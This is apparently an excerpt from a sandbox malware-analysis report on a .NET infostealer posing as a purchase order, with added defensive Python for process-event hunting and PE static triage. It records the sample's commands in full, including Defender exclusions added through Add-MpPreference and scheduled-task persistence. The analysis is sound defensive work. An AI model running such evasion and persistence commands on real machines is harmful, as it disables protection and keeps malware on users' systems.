Source: 0.2.nOrden_de_compra.exe.3f77ae8.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: nOrden_de_compra.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nNdsLvHyWi.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, lY.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, UyDMxsd3t.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, 86A7K.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, vztq.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, B80ITW1.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, uQSn7t.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, bEoUgRL.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, Dg1qrk6E.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nOrden_de_compra.exe.3fb4308.2.raw.unpack, Dg1qrk6E.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, kp8qwk5XbcOdplPSn8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, kp8qwk5XbcOdplPSn8.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.cs | Security API names: _0020.SetAccessControl
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.cs | Security API names: _0020.AddAccessRule
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.cs | Security API names: _0020.SetAccessControl
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.cs | Security API names: _0020.AddAccessRule
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | File created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3804:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4344:120:WilError_03
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Mutant created: \Sessions\1\BaseNamedObjects\BVLcFHVzoBgkOFRmqAinQVZmS
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6312:120:WilError_03
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp
Source: nOrden_de_compra.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: nOrden_de_compra.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: nOrden_de_compra.exe | ReversingLabs: Detection: 63%
Source: nOrden_de_compra.exe | Virustotal: Detection: 43%
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | File read: C:\Users\user\Desktop\nOrden_de_compra.exe
Source: unknown | Process created: C:\Users\user\Desktop\nOrden_de_compra.exe, command line: C:\Users\user\Desktop\nOrden_de_compra.exe
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Windows\SysWOW64\schtasks.exe, command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Users\user\Desktop\nOrden_de_compra.exe, command line: C:\Users\user\Desktop\nOrden_de_compra.exe
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Process created: C:\Users\user\Desktop\nOrden_de_compra.exe, command line: C:\Users\user\Desktop\nOrden_de_compra.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, command line: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe, command line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Process created: C:\Windows\SysWOW64\schtasks.exe, command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe, command line: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Process created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe, command line: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
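Hunting logic for the process tree recorded above, as an added example that is not part of the Joe Sandbox report or of the sample. The events it runs on are reconstructed from the report's process-creation lines (quoting restored), plus one constructed variant in which the same exclusion is passed through -EncodedCommand and one constructed benign control; the rule names, the event schema and the Temp-path pattern are the example's own assumptions. It raises the three behaviours the report records: a Defender exclusion added with Add-MpPreference, a scheduled task created from an XML file in the user's Temp directory, and a binary in a user-writable path launching a second copy of itself.

```python
"""Hunting rules over process-creation events (example added to this page; not Joe Sandbox
code and not part of the sample). SAMPLE_EVENTS is reconstructed from the report's process
tree; the -EncodedCommand event and the benign control are constructed."""
import base64
import re

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
MP_EXCLUSION = re.compile(r"add-mppreference.*-exclusion(?:path|process|extension)", re.I | re.S)
TEMP_XML = re.compile(r'/xml\s+"?([^"\s]*\\appdata\\local\\temp\\[^"\s]*\.tmp)', re.I)
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\(?:appdata|desktop|downloads)\\", re.I)


def effective_powershell_command(cmdline: str) -> str:
    """The script PowerShell will really run: -EncodedCommand carries base64 of UTF-16LE
    text, so match on the decoded form when present, otherwise on the raw command line."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def detect(events):
    """Return (rule, parent_image, evidence) for every event that matches a rule.
    Rule names are the example's own; an event can match more than one."""
    findings = []
    for ev in events:
        parent, image, cmd = ev["parent"], ev["image"], ev["cmdline"]
        # Defender exclusion added through PowerShell, in clear text or encoded
        if image.lower().endswith("powershell.exe"):
            script = effective_powershell_command(cmd)
            if MP_EXCLUSION.search(script):
                findings.append(("defender_exclusion_added", parent, script))
        # task registered from an XML definition dropped in the user's Temp directory
        if image.lower().endswith("schtasks.exe") and re.search(r"/create\b", cmd, re.I):
            m = TEMP_XML.search(cmd)
            if m:
                findings.append(("schtask_from_temp_xml", parent, m.group(1)))
        # a binary in a user-writable path starting a second copy of itself; for .NET
        # loaders this is usually the child that receives the injected payload
        if image.lower() == parent.lower() and USER_WRITABLE.search(parent):
            findings.append(("self_spawn_from_user_path", parent, cmd))
    return findings


DESKTOP = r"C:\Users\user\Desktop\nOrden_de_compra.exe"
ROAMING = r"C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
PS_CMD = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
TASK_CMD = r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML '

# constructed variant: the same exclusion hidden behind -EncodedCommand
ENCODED = base64.b64encode(("Add-MpPreference -ExclusionPath " + ROAMING).encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"parent": DESKTOP, "image": PS, "cmdline": PS_CMD + ' Add-MpPreference -ExclusionPath "' + DESKTOP + '"'},
    {"parent": DESKTOP, "image": PS, "cmdline": PS_CMD + ' Add-MpPreference -ExclusionPath "' + ROAMING + '"'},
    {"parent": DESKTOP, "image": SCHTASKS, "cmdline": TASK_CMD + r'"C:\Users\user\AppData\Local\Temp\tmpD5F2.tmp"'},
    {"parent": DESKTOP, "image": DESKTOP, "cmdline": DESKTOP},
    {"parent": ROAMING, "image": SCHTASKS, "cmdline": TASK_CMD + r'"C:\Users\user\AppData\Local\Temp\tmpE302.tmp"'},
    {"parent": ROAMING, "image": ROAMING, "cmdline": ROAMING},
    {"parent": DESKTOP, "image": PS, "cmdline": PS_CMD + " -EncodedCommand " + ENCODED},
    # constructed benign control: PowerShell launched from Explorer, no exclusion change
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": PS_CMD + " Get-MpPreference"},
]

if __name__ == "__main__":
    for rule, parent, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule:<28} parent={parent}\n{'':<28} {evidence}")
```

The decode runs before the match so that one rule covers both the clear-text form shown in this report and the encoded form; on real telemetry the events would come from Sysmon Event ID 1 or from 4688 with command-line auditing enabled, and the parent path check is what separates this tree from an administrator adding an exclusion from an elevated console.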
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
Source: nOrden_de_compra.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: nOrden_de_compra.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: nOrden_de_compra.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: rYwr.pdbSHA256$x] | source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr
Source: Binary string: rYwr.pdb | source: nOrden_de_compra.exe, nNdsLvHyWi.exe.0.dr

                      Data Obfuscation

Source: 0.2.nOrden_de_compra.exe.3ca9970.4.raw.unpack, lY.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.nOrden_de_compra.exe.2cde9dc.0.raw.unpack, SU.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.nOrden_de_compra.exe.7160000.5.raw.unpack, lY.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: nOrden_de_compra.exe, Form11.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: nNdsLvHyWi.exe.0.dr, Form11.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.cs | .Net Code: O20eo3LBDN System.Reflection.Assembly.Load(byte[])
Source: 0.2.nOrden_de_compra.exe.4097d28.3.raw.unpack, VahwTb7cT8mornX0bA.cs | .Net Code: O20eo3LBDN System.Reflection.Assembly.Load(byte[])
Source: nOrden_de_compra.exe | Static PE information: 0xB560437B [Sat Jun 5 17:33:47 2066 UTC]
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Code function: 0_2_071E83B0 pushfd ; retf 0_2_071E83BD
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Code function: 0_2_071E81C1 push esp; retf 0_2_071E81CD
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Code function: 0_2_071E81F8 pushad ; retf 0_2_071E8205
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Code function: 0_2_0722546A pushfd ; ret 0_2_07225471
Source: C:\Users\user\Desktop\nOrden_de_compra.exe | Code function: 10_2_02CD0CB5 push edi; ret 10_2_02CD0CC2
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD76C3 push cs; retf 11_2_06CD76CA
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD7643 push esp; retf 11_2_06CD7645
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD767B pushad ; retf 11_2_06CD767D
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD7671 push cs; retf 11_2_06CD7672
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD7673 push cs; retf 11_2_06CD767A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB777 push edi; retf 11_2_06CDB77A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB773 push edi; retf 11_2_06CDB776
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD7708 push cs; retf 11_2_06CD770A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB727 push edi; retf 11_2_06CDB72A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB720 push edi; retf 11_2_06CDB722
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB45B push ebp; retf 11_2_06CDB462
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB2D0 push ebx; retf 11_2_06CDB2D2
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB243 push edx; retf 11_2_06CDB246
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB360 push ebx; retf 11_2_06CDB362
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB363 push ebx; retf 11_2_06CDB366
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB088 push edx; retf 11_2_06CDB11A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB079 push ecx; retf 11_2_06CDB07A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB1F3 push edx; retf 11_2_06CDB1F6
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB1B9 push edx; retf 11_2_06CDB1BA
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD6E6B push es; retf 11_2_06CD6E6E
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD6DE1 push es; retf 11_2_06CD6DE2
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD6DE3 push es; retf 11_2_06CD6DE6
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD6D01 push es; retf 11_2_06CD6D02
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD6D3F push es; retf 11_2_06CD6D42
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CD6D38 push es; retf 11_2_06CD6D3A
Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe | Code function: 11_2_06CDB893 push edi; retf 11_2_06CDB89A
Source: nOrden_de_compra.exe | Static PE information: section name: .text entropy: 7.935524491398435
Source: nNdsLvHyWi.exe.0.dr | Static PE information: section name: .text entropy: 7.935524491398435
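Static triage for the PE facts the report gives for nOrden_de_compra.exe: the TimeDateStamp 0xB560437B (June 2066), the CODE|EXECUTE|READ flags on .text, and the .text entropy of 7.93, together with the identifier-entropy measure behind the report's "High entropy of concatenated method names" findings. This is an added example, not Joe Sandbox's logic and not part of the sample: it parses only the COFF header and section table, the image it inspects is a minimal PE constructed in the block to carry those values, and the 7.2 entropy threshold, the one-day clock-skew allowance, the 1995 lower bound and the benign identifier list are the example's own assumptions. On a real file, pass the file's bytes to triage().

```python
"""Static triage of the PE indicators listed above (example added to this page; not Joe
Sandbox code and not part of the sample). The image it inspects is constructed with
struct to carry the report's values: TimeDateStamp 0xB560437B, a CODE|EXECUTE|READ
.text section, and a near-8.0-entropy payload. Read a real file's bytes instead."""
import hashlib
import math
import struct
from datetime import datetime, timedelta, timezone

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes
COFF_HDR = "<HHIIIHH"         # IMAGE_FILE_HEADER, 20 bytes


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly random data."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def decode_timestamp(ts: int) -> datetime:
    # timedelta arithmetic avoids fromtimestamp() range limits for far-future values
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)


def parse_pe(image: bytes) -> dict:
    """Minimal parse: COFF header timestamp plus each section's flags and raw bytes."""
    if image[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    _, nsec, ts, _, _, opt_size, _ = struct.unpack_from(COFF_HDR, image, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, _, _, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(SECTION_HDR, image, table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "characteristics": chars, "data": image[rawptr:rawptr + rawsize]})
    return {"timestamp": ts, "sections": sections}


def triage(image: bytes, now: int) -> list:
    """(indicator, detail) pairs; thresholds are this example's choices, not Joe Sandbox's."""
    pe = parse_pe(image)
    out = []
    when = decode_timestamp(pe["timestamp"])
    if pe["timestamp"] > now + 86400 or when.year < 1995:   # one day of clock skew allowed
        out.append(("suspicious_timestamp", when.isoformat()))
    for s in pe["sections"]:
        ent = shannon_entropy(s["data"])
        if s["characteristics"] & IMAGE_SCN_CNT_CODE and ent > 7.2:   # compiled code sits well below this
            out.append(("high_entropy_code_section", f"{s['name']} {ent:.2f}"))
        if s["characteristics"] & IMAGE_SCN_MEM_WRITE and s["characteristics"] & IMAGE_SCN_MEM_EXECUTE:
            out.append(("wx_section", s["name"]))           # self-modifying unpacker stubs need W+X
    return out


def identifier_entropy(names) -> float:
    """The report's 'high entropy of concatenated method names' measure applied to a list."""
    return shannon_entropy("".join(names).encode("ascii", "replace"))


def pseudo_random_bytes(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for a packed payload."""
    out, h = bytearray(), seed
    while len(out) < n:
        h = hashlib.sha256(h).digest()
        out += h
    return bytes(out[:n])


def build_sample_pe(text: bytes, timestamp: int, characteristics: int) -> bytes:
    """Constructed minimal image: DOS stub, COFF header, zeroed PE32 optional header,
    one .text section. Enough for parse_pe(); not something Windows would load."""
    e_lfanew, opt_size = 0x40, 0xE0
    raw_ptr = e_lfanew + 24 + opt_size + 40
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack(COFF_HDR, 0x14C, 1, timestamp, 0, 0, opt_size, 0x0102)
    sec = struct.pack(SECTION_HDR, b".text", len(text), 0x2000, len(text), raw_ptr, 0, 0, 0, 0, characteristics)
    return dos + coff + b"\0" * opt_size + sec + text


OBFUSCATED_NAMES = ["pXwn8AxVdQ", "cESnjDjyIt", "UXunxURNEB", "cqAnYwSAn5",
                    "cFXn1xIknu", "SCnnnb8dse", "knonJ3Uobt"]          # taken from the report
BENIGN_NAMES = ["InitializeComponent", "Dispose", "ToString", "GetHashCode", "Equals"]  # constructed control

if __name__ == "__main__":
    rx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    packed = build_sample_pe(pseudo_random_bytes(65536), 0xB560437B, rx)
    print(triage(packed, now=1705000000))
    print(f"names: obfuscated {identifier_entropy(OBFUSCATED_NAMES):.2f} vs benign {identifier_entropy(BENIGN_NAMES):.2f}")
```

Deterministic Roslyn builds (and MSVC /Brepro) write a content hash into TimeDateStamp, so a future date on its own is weak evidence; it is the combination with a near-maximum-entropy code section and the AppDomain.Load(byte[]) call in the decompiled source that points at a packed .NET loader.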
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, qlDLMdzah6XGe81ZR4.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'pXwn8AxVdQ', 'cESnjDjyIt', 'UXunxURNEB', 'cqAnYwSAn5', 'cFXn1xIknu', 'SCnnnb8dse', 'knonJ3Uobt'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, OyOqeoeatmsG22RUyf.cs | High entropy of concatenated method names: 'JK74Zp8qwk', 'xbc47OdplP', 'ifk4FXltIZ', 'ErP4UnXgm5', 'jLg4j9L5Fc', 'WOW4xUDLkZ', 'u60HwKfUDb37IZVlHn', 'DrYVWGVS84EdjnPx01', 'nQN44tyf4V', 'Qjw4VVuUlL'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, M5tu5eScEBZf24uGb6.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Nynp0FqCwa', 'HHjpuVkpPt', 'gQppzx1Q4N', 'LCBVaOcCQP', 'DwJV4PxuYd', 'cZrVpMljnu', 'Xc7VVjpe1A', 'URQe9pssTfI53BD6l98'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, DFcyOWbUDLkZIX04JR.cs | High entropy of concatenated method names: 'BXnMNtI8DI', 'gbFMcPorB4', 'POoMCB0x07', 'oDNMZYEao4', 'tGBM7ZW2aZ', 'QPCCkSOuiw', 'zhZCBUn3tM', 'vjuCvT8ZL1', 'mOYCyTjkjS', 'opvC0gPN0C'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, dSPneu4Vjx6HTGfCEdG.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'WagJ9Nlr8b', 'u3QJP5YZQR', 'nFdJWjt40G', 'fQyJ2BNJGd', 'bQ7JkLwtH5', 'ULlJBjRCBx', 'D1wJvX5WjN'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, JSMvQGDlHAfTwMe3ZO.cs | High entropy of concatenated method names: 'RKF85RQHxR', 'xJs8qOVEqg', 'X048bi6C1U', 'QOR8tpwed8', 'rPV8mY4mGw', 'me48r4Fys1', 'WKS8f225l4', 'qdL8H5yIdc', 'HGo8AlYwI8', 'K3O8EUDBJE'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, cDToTJpHXBOUtdduer.cs | High entropy of concatenated method names: 'NOBoLeGHI', 'Q2Msr290T', 'HsEKEAcmK', 'pZKRCHrOw', 'jMFqmu74v', 'Xjji3YQsl', 'WM9m99eBqSRaCcgGHi', 'WbDeRUMry9pAMhQX3M', 'dya1Z95KQ', 'ld4J119X2'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, UYJYJc2aCln22jB6Dg.cs | High entropy of concatenated method names: 'oseYFbC1I2', 'mN3YU31JMy', 'ToString', 'NifYIGikQ0', 'W6xYcbNm3d', 'fHBYSpQpQs', 'MQOYCk0jM2', 'nkoYMoiOcK', 'xiaYZhCxcJ', 'cLgY7sE68f'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, VahwTb7cT8mornX0bA.cs | High entropy of concatenated method names: 'NS3VNZtKb9', 'tQIVIx3a00', 'jvhVc0sdET', 'BdrVSkZhkC', 'xvdVCJjWvZ', 'uS2VM6infV', 'TgGVZrNLnY', 'cktV7SVccW', 'r8FVdLcM7d', 'MqbVFSVfq0'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, wnrE3F4a8RgEIeqXaee.cs | High entropy of concatenated method names: 'LyZnlp5N1j', 'EO3nOERWBZ', 'PfmnoZ7BrU', 'VxensYm7li', 'HgRnQ8BYyw', 'VjsnKnB0yF', 'S0onREy77Y', 'QR3n5CUn9E', 'MoGnqH6R4H', 'Gggniy6lRY'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, pGHbeS03tIufXepgXX.cs | High entropy of concatenated method names: 'En01brJmA6', 'Pu01thMwkD', 'iR91T8yUmc', 'aYl1mDsonm', 'piD19XPDYI', 'cQi1r1aesW', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.nOrden_de_compra.exe.7e10000.8.raw.unpack, U9QAgVuaOBrXhXAvIx.cs | High entropy of concatenated method names: 'WvJn4PmfSx', 'b9dnVo0fH6', 'jwYneEvJhQ', 'SwSnIWksaR', 'vu4ncmBcj6', 'pVDnCHqkr1', 'nUcnMvBAli', 'ojq1vXiCtA', 'ObG1yCOmE6', 'X4P104GC0v'
